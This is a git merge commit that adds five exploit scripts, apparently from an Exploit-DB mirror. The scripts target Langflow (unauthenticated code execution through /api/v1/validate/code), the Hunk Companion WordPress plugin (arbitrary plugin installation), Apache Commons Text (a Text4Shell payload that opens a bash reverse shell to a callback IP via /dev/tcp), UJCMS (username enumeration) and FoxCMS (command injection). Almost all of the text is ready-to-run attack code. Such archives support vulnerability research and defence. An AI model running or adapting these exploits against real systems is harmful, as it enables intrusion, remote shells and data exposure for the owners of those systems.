Merge remote-tracking branch 'upstream/main'

Author: certcc-ghbot

exploits/multiple/remote/52262.txt

@@ -0,0 +1,107 @@
+# Exploit Title: Langflow 1.3.0 -  Remote Code Execution (RCE)
+# Date: 2025-04-17
+# Exploit Author: VeryLazyTech
+# Vendor Homepage: http://www.langflow.org/
+# Software Link: https://github.com/langflow-ai/langflow
+# Version: Langflow < 1.3.0
+# Tested on: Windows Server 2019
+# CVE: CVE-2025-3248
+# CVE-2025-3248 - Remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code
+# FOFA "Langflow"
+# Medium: https://medium.com/@verylazytech
+# GitHub: https://github.com/verylazytech
+# Shop: https://shop.verylazytech.com
+# Website: https://www.verylazytech.com
+
+import argparse
+import requests
+import json
+from urllib.parse import urljoin
+import random
+from colorama import init, Fore, Style
+
+# Disable SSL warnings
+requests.packages.urllib3.disable_warnings()
+
+# Initialize colorama
+init(autoreset=True)
+
+# Constants
+ENDC = "\033[0m"
+ENCODING = "UTF-8"
+COLORS = [Fore.GREEN, Fore.CYAN, Fore.BLUE]
+
+def banner():
+    random_color = random.choice(COLORS)
+    return f"""{Style.BRIGHT}{random_color}
+  ______     _______   ____   ___ ____  ____    _________  _  _    ___
+ / ___\ \   / / ____| |___ \ / _ \___ \| ___|  |___ /___ \| || |  ( _ )
+| |    \ \ / /|  _|     __) | | | |__) |___ \    |_ \ __) | || |_ / _ \
+| |___  \ V / | |___   / __/| |_| / __/ ___) |  ___) / __/|__   _| (_) |
+ \____|  \_/  |_____| |_____|\___/_____|____/  |____/_____|  |_|  \___/
+
+
+__     __                _                      _____         _
+\ \   / /__ _ __ _   _  | |    __ _ _____   _  |_   _|__  ___| |__
+ \ \ / / _ \ '__| | | | | |   / _` |_  / | | |   | |/ _ \/ __| '_ \
+  \ V /  __/ |  | |_| | | |__| (_| |/ /| |_| |   | |  __/ (__| | | |
+   \_/ \___|_|   \__, | |_____\__,_/___|\__, |   |_|\___|\___|_| |_|
+                 |___/                  |___/
+
+                    {Style.BRIGHT}{Fore.WHITE}@VeryLazyTech - Medium {Style.RESET_ALL}\n
+{Style.RESET_ALL}
+"""
+
+print(banner())
+
+class LangflowScanner:
+    def __init__(self, url, timeout=10):
+        self.url = url.rstrip('/')
+        self.timeout = timeout
+        self.session = requests.Session()
+        self.session.verify = False
+        self.session.headers.update({
+            'User-Agent': 'Mozilla/5.0',
+            'Content-Type': 'application/json',
+            'Accept': 'application/json',
+        })
+
+    def exploit(self, command):
+        endpoint = urljoin(self.url, '/api/v1/validate/code')
+        payload = {
+            "code": f"""
+def run(cd=exec('raise Exception(__import__("subprocess").check_output("{command}", shell=True))')): pass
+"""
+        }
+
+        try:
+            print(f"{Fore.YELLOW}[*] Sending payload to {endpoint}")
+            response = self.session.post(endpoint, json=payload, timeout=self.timeout)
+            print(f"{Fore.YELLOW}[*] Status Code: {response.status_code}")
+            print(f"{Fore.YELLOW}[*] Raw Response: {response.text}")
+
+            if response.status_code == 200:
+                try:
+                    data = response.json()
+                    error_msg = data.get("function", {}).get("errors", [""])[0]
+                    if isinstance(error_msg, str) and error_msg.startswith("b'"):
+                        output = error_msg[2:-1].encode().decode('unicode_escape').strip()
+                        return output
+                except Exception as e:
+                    return f"[!] Failed to parse response: {str(e)}"
+            return f"[!] Exploit failed with status {response.status_code}"
+        except requests.RequestException as e:
+            return f"[!] Request failed: {str(e)}"
+
+def main():
+    parser = argparse.ArgumentParser(description="Langflow CVE-2025-3248 Exploit")
+    parser.add_argument("url", help="Target base URL (e.g., http://host:port)")
+    parser.add_argument("cmd", help="Command to execute (e.g., whoami)")
+    args = parser.parse_args()
+
+    scanner = LangflowScanner(args.url)
+    result = scanner.exploit(args.cmd)
+    print(f"{Fore.GREEN}[+] Command Output:\n{result}")
+
+if __name__ == "__main__":
+    main()

exploits/multiple/webapps/52259.py

@@ -0,0 +1,65 @@
+# Exploit Title: Hunk Companion Plugin 1.9.0 - Unauthenticated Plugin Installation
+# Date: 16 December, 2024
+# Exploit Author: Jun Takemura
+# Author's GitHub: https://github.com/JunTakemura
+# Author's Blog: juntakemura.dev
+# Vendor Homepage: https://themehunk.com
+# Software Link: https://wordpress.org/plugins/hunk-companion/
+# Version: Tested on Hunk Companion 1.8.8
+# CVE: CVE-2024-11972
+# Vulnerability Description:
+#     Exploits a flaw in the Hunk Companion plugin's permission_callback for the
+#     /wp-json/hc/v1/themehunk-import endpoint, allowing unauthenticated attackers
+#     to install and activate arbitrary plugins from the WordPress.org repository.
+# Tested on: Ubuntu
+# Original vulnerability discovered by: Daniel Rodriguez
+#
+# Usage:
+#     1. Update `target_url` below with the target WordPress site's URL.
+#     2. Update `plugin_name` with the slug of the plugin you want to install.
+#     3. Run: python3 exploit.py
+#
+import requests
+from urllib.parse import urljoin
+
+# Update 'URL' with your target WordPress site URL, for example "http://localhost/wordpress"
+target_url = "URL"
+
+# Update 'NAME' with desired plugin's name (slug), for example "wp-query-console"
+plugin_name = "NAME"
+
+endpoint = "/wp-json/hc/v1/themehunk-import"
+url = urljoin(target_url, endpoint)
+
+payload = {
+    "params": {
+        "plugin": {
+            plugin_name: "Plugin Label"
+        },
+        "allPlugins": [
+            {
+                plugin_name: f"{plugin_name}/{plugin_name}.php"
+            }
+        ],
+        "themeSlug": "theme",
+        "proThemePlugin": "plugin",
+        "templateType": "free",
+        "tmplFreePro": "theme",
+        "wpUrl": target_url
+    }
+}
+
+headers = {
+    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64)",
+    "Content-Type": "application/json"
+}
+
+try:
+    response = requests.post(url, json=payload, headers=headers, timeout=10)
+    response.raise_for_status()  # Raises an HTTPError if the response is not 2xx
+
+    print(f"[+] Exploit sent successfully.")
+    print(f"Response Status Code: {response.status_code}")
+    print(f"Response Body: {response.text}")
+except requests.exceptions.RequestException as e:
+    print(f"[-] Request failed: {e}")

exploits/multiple/webapps/52261.py

@@ -0,0 +1,58 @@
+# Exploit Title: Apache Commons Text  1.10.0 - Remote Code Execution
+(Text4Shell - POST-based)
+# Date: 2025-04-17
+# Exploit Author: Arjun Chaudhary
+# Vendor Homepage: https://commons.apache.org/proper/commons-text/
+# Software Link:https://repo1.maven.org/maven2/org/apache/commons/commons-text/
+# Version: Apache Commons Text < 1.10.0
+# Tested on: Ubuntu 20.04 (Docker container), Java 11+, Apache Commons Text 1.9
+# CVE: CVE-2022-42889
+# Type: Remote Code Execution (RCE)
+# Method: POST request, script interpolator
+# Notes: This exploit demonstrates an RCE vector via POST data, differing
+from common GET-based payloads.
+
+#!/usr/bin/env python3
+
+import urllib.parse
+import http.client
+import sys
+
+def usage():
+    print("Usage: python3 text4shell.py <target_ip> <callback_ip> <callback_port>")
+    print("Example: python3 text4shell.py 127.0.0.1 192.168.22.128 4444")
+    sys.exit(1)
+
+if len(sys.argv) != 4:
+    usage()
+
+target_ip = sys.argv[1]
+callback_ip = sys.argv[2]
+callback_port = sys.argv[3]
+
+raw_payload = (
+    f"${{script:javascript:var p=java.lang.Runtime.getRuntime().exec("
+    f"['bash','-c','bash -c \\'exec bash -i >& /dev/tcp/{callback_ip}/{callback_port} 0>&1\\''])}}"
+)
+
+
+encoded_payload = urllib.parse.quote(raw_payload)
+
+
+path = f"/?data={encoded_payload}" # modify the parameter according to your target
+
+print(f"[!] Remember to modify the parameter according to your target")
+print(f"[+] Target: http://{target_ip}{path}")
+print(f"[+] Payload (decoded): {raw_payload}")
+
+
+conn = http.client.HTTPConnection(target_ip, 80)
+conn.request("POST", path, body="", headers={
+    "Host": target_ip,
+    "Content-Type": "application/json",
+    "Content-Length": "0"
+})
+response = conn.getresponse()
+print(f"[+] Response Status: {response.status}")
+print(response.read().decode())
+conn.close()

exploits/multiple/webapps/52264.py

@@ -0,0 +1,61 @@
+# Exploit Title: UJCMS 9.6.3 User Enumeration via IDOR
+# Exploit Author: Cyd Tseng
+# Date: 11 Dec 2024
+# Category: Web application
+# Vendor Homepage: https://dromara.org/
+# Software Link: https://github.com/dromara/ujcms
+# Version: UJCMS 9.6.3
+# Tested on: Linux
+# CVE: CVE-2024-12483
+# Advisory: https://github.com/cydtseng/Vulnerability-Research/blob/main/ujcms/IDOR-UsernameEnumeration.md
+
+"""
+
+An Insecure Direct Object Reference (IDOR) vulnerability was discovered in UJCMS version 9.6.3 that allows unauthenticated enumeration of usernames through the manipulation of the user id parameter in the /users/id endpoint. While the user IDs are generally large numbers (e.g., 69278363520885761), with the exception of the admin and anonymous account, unauthenticated attackers can still systematically discover usernames of existing accounts.
+
+"""
+
+
+import requests
+from bs4 import BeautifulSoup
+import time
+import re
+
+BASE_URL = 'http://localhost:8080/users/{}' # Modify as necessary!
+HEADERS = {
+    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36',
+    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+    'Connection': 'keep-alive'
+}
+
+def fetch_user_data(user_id):
+    url = BASE_URL.format(user_id)
+    try:
+        response = requests.get(url, headers=HEADERS)
+        if response.status_code == 200:
+            soup = BeautifulSoup(response.content, 'html.parser')
+            title = soup.title.string.strip()
+            if title.lower() != '404':
+                username = re.sub(r' - UJCMS演示站$', '', title)
+                return user_id, username
+        return None
+    except requests.RequestException as e:
+        print(f"Error fetching data for user ID {user_id}: {e}")
+        return None
+
+def user_id_generator(start, end):
+    for user_id in range(start, end + 1):
+        yield user_id
+
+def enumerate_users(start_id, end_id):
+    for user_id in user_id_generator(start_id, end_id):
+        user_data = fetch_user_data(user_id)
+        if user_data:
+            print(f"Valid user found: ID {user_data[0]} with username '{user_data[1]}'")
+        time.sleep(0.1)
+
+if __name__ == '__main__':
+    start_id = int(input("Enter the starting user ID: "))
+    end_id = int(input("Enter the ending user ID: "))
+    print(f"Starting enumeration from ID {start_id} to {end_id}...")
+    enumerate_users(start_id, end_id)

exploits/multiple/webapps/52267.bash

@@ -0,0 +1,63 @@
+# Date: 2025-04-17
+# Exploit Title:
+# Exploit Author: VeryLazyTech
+# Vendor Homepage: https://www.foxcms.org/
+# Software Link: https://www.foxcms.cn/
+# Version: FoxCMS v.1.2.5
+# Tested on: Ubuntu 22.04, Windows Server 2019
+# CVE: CVE-2025-29306
+# Website: https://www.verylazytech.com
+
+#!/bin/bash
+
+banner() {
+cat <<'EOF'
+  ______     _______   ____   ___ ____  ____    ____   ___ _____  ___   __
+ / ___\ \   / / ____| |___ \ / _ \___ \| ___|  |___ \ / _ \___ / / _ \ / /_
+| |    \ \ / /|  _|     __) | | | |__) |___ \    __) | (_) ||_ \| | | | '_ \
+| |___  \ V / | |___   / __/| |_| / __/ ___) |  / __/ \__, |__) | |_| | (_) |
+ \____|  \_/  |_____| |_____|\___/_____|____/  |_____|  /_/____/ \___/ \___/
+
+__     __                _                      _____         _
+\ \   / /__ _ __ _   _  | |    __ _ _____   _  |_   _|__  ___| |__
+ \ \ / / _ \ '__| | | | | |   / _` |_  / | | |   | |/ _ \/ __| '_ \
+  \ V /  __/ |  | |_| | | |__| (_| |/ /| |_| |   | |  __/ (__| | | |
+   \_/ \___|_|   \__, | |_____\__,_/___|\__, |   |_|\___|\___|_| |_|
+                 |___/                  |___/
+
+
+                    @VeryLazyTech - Medium
+
+EOF
+
+}
+
+# Call the banner function
+banner
+
+set -e
+
+# Check for correct number of arguments
+if [ "$#" -ne 2 ]; then
+    printf "Usage: $0 <url> <command>"
+    exit 1
+fi
+
+TARGET=$1
+
+# Encode payload
+ENCODED_CMD=$(python3 -c "import urllib.parse; print(urllib.parse.quote('\${@print_r(@system(\"$2\"))}'))")
+FULL_URL="${TARGET}?id=${ENCODED_CMD}"
+
+echo "[*] Sending RCE payload: $2"
+HTML=$(curl -s "$FULL_URL")
+
+# Extract <ul> from known XPath location using xmllint
+UL_CONTENT=$(echo "$HTML" | xmllint --html --xpath "/html/body/header/div[1]/div[2]/div[1]/ul" - 2>/dev/null)
+
+# Strip tags, clean up
+CLEANED=$(echo "$UL_CONTENT" | sed 's/<[^>]*>//g' | sed '/^$/d' | sed 's/^[[:space:]]*//')
+
+echo
+echo "[+] Command Output:"
+echo "$CLEANED"